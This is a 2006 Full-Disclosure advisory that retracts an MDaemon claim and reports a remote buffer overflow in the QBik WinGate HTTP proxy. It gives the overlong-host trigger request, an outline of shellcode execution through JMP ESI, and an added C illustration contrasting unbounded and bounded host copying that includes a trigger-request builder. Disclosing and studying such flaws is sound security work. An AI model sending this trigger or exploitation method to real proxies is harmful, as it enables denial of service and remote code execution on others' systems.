[Full-disclosure] MDaemon NOT vulnerable .. sorry for the advisory.. QBik Wingate is vulnerable

Jun 07, 2006 (mirrored on vulners.com, securityvulns SECURITYVULNS:DOC:13013)
Hello, this is kcope,

Recently I thought I had discovered a remote preauth vulnerability in the latest MDaemon version (9.0.1/9.0.2). And it really looked like one in the debugger (OllyDbg) ... so I posted it to full-disclosure. Afterwards I tried to write an exploit, and yes, I succeeded! But the problem is that the "vulnerability" is only exploitable inside the debugger, for some weird reason. I guess it is not exploitable under normal conditions without a debugger attached. I guess the exception handler drops us to another place when a debugger is not attached. Because I am not in a position to provide a working exploit for this, I am taking back my advisory and ask the vendor and you guys to forgive me for that stupid posting, shit happens. In future I will only release advisories with proven exploits :)

Ok, let's go.

QBik Wingate version 6.1.1.1077 Remote Buffer Overflow

WinGate 6.1 is a sophisticated integrated Internet gateway and communications server designed to meet the control, security and email needs of today's Internet-connected businesses.

Description

The WinGate product from QBik has a buffer overflow in its HTTP proxy when handling an overly long host name in the request line of an HTTP request (an absolute URI of the form http://host/ sent to a proxy port).

A request like the following triggers an access violation due to the buffer overflow:

    POST http://[AAAAAAA…A]/ HTTP/1.0\r\n\r\n

When such a request is supplied, the WinGate process does not crash (the access violation is caught by its exception handlers rather than terminating it), but it stops servicing requests on all proxy ports.
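The following is an added illustration and is not code from WinGate or from this advisory: a hypothetical proxy routine that copies the host part of an absolute request-URI into a fixed-size stack buffer without checking its length (the pattern described above), the bounded version of the same routine that rejects an oversized host, and a builder for the trigger request shown above. The buffer size HOST_MAX, the function names and the 4096-byte host length are assumptions; nothing here reflects how WinGate actually parses requests.

```c
/*
 * Added illustration, not WinGate code: a hypothetical host-extraction
 * routine with an unbounded copy beside a bounded version, plus a builder
 * for the advisory's trigger request (POST http://AAAA.../ HTTP/1.0).
 * HOST_MAX, the function names and the host length are assumptions.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define HOST_MAX 256   /* assumed fixed stack buffer size in the vulnerable pattern */

/* Locate the host in "...://host/..." and return its start and length,
 * or NULL when the URL carries no scheme separator. */
static const char *host_start(const char *url, size_t *len)
{
    const char *p = strstr(url, "://");
    if (!p) return NULL;
    p += 3;
    const char *end = strpbrk(p, "/ \r\n");   /* host ends at path, space or CRLF */
    *len = end ? (size_t)(end - p) : strlen(p);
    return p;
}

/* Vulnerable pattern: the host length is never compared with the buffer,
 * so a host of HOST_MAX bytes or more overruns 'out' on the stack. */
static void extract_host_unsafe(const char *url, char out[HOST_MAX])
{
    size_t len;
    const char *h = host_start(url, &len);
    if (!h) { out[0] = '\0'; return; }
    memcpy(out, h, len);        /* no bound: overflows when len >= HOST_MAX */
    out[len] = '\0';
}

/* Hardened version: refuse a host that would not fit instead of copying it.
 * Returns 0 on success and -1 when the host is absent or too long. */
static int extract_host_safe(const char *url, char out[HOST_MAX])
{
    size_t len;
    const char *h = host_start(url, &len);
    if (!h || len == 0 || len >= HOST_MAX) return -1;
    memcpy(out, h, len);
    out[len] = '\0';
    return 0;
}

/* Build "POST http://AAAA.../ HTTP/1.0\r\n\r\n" with host_len 'A' bytes.
 * The caller frees the result; *out_len receives the request length. */
static char *build_trigger(size_t host_len, size_t *out_len)
{
    const char *pre = "POST http://";
    const char *post = "/ HTTP/1.0\r\n\r\n";
    size_t n = strlen(pre) + host_len + strlen(post);
    char *buf = malloc(n + 1);
    if (!buf) return NULL;
    memcpy(buf, pre, strlen(pre));
    memset(buf + strlen(pre), 'A', host_len);
    memcpy(buf + strlen(pre) + host_len, post, strlen(post) + 1);
    *out_len = n;
    return buf;
}

int main(void)
{
    char host[HOST_MAX];
    size_t n;
    char *req = build_trigger(4096, &n);   /* 4096-byte host: an assumed length */
    if (!req) return 1;
    printf("trigger request is %zu bytes\n", n);

    /* The bounded parser rejects the oversized host; the unbounded one
     * would smash the stack here, so it is only exercised with a host that fits. */
    if (extract_host_safe(req, host) != 0)
        printf("bounded parser rejected the oversized host\n");
    extract_host_unsafe("POST http://example.test/ HTTP/1.0\r\n\r\n", host);
    printf("unbounded parser on a benign host: %s\n", host);

    free(req);
    return 0;
}
```

The request builder produces exactly the byte sequence a proxy sees on the wire, so the same buffer can be written to a socket connected to a proxy port to reproduce the denial of service described above; the unsafe routine is kept only to show the missing check, not to be fed the trigger.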

In my audit, to exploit this vulnerability, EIP is redirected to our own location after several exception handlers kicked in. When EIP is redirected, ESI holds our buffer including the shellcode. So I chose a JMP ESI in memory space for the EIP redirection and successfully executed the shellcode.

An exploit for Windows 2000 is attached.

-- kingcope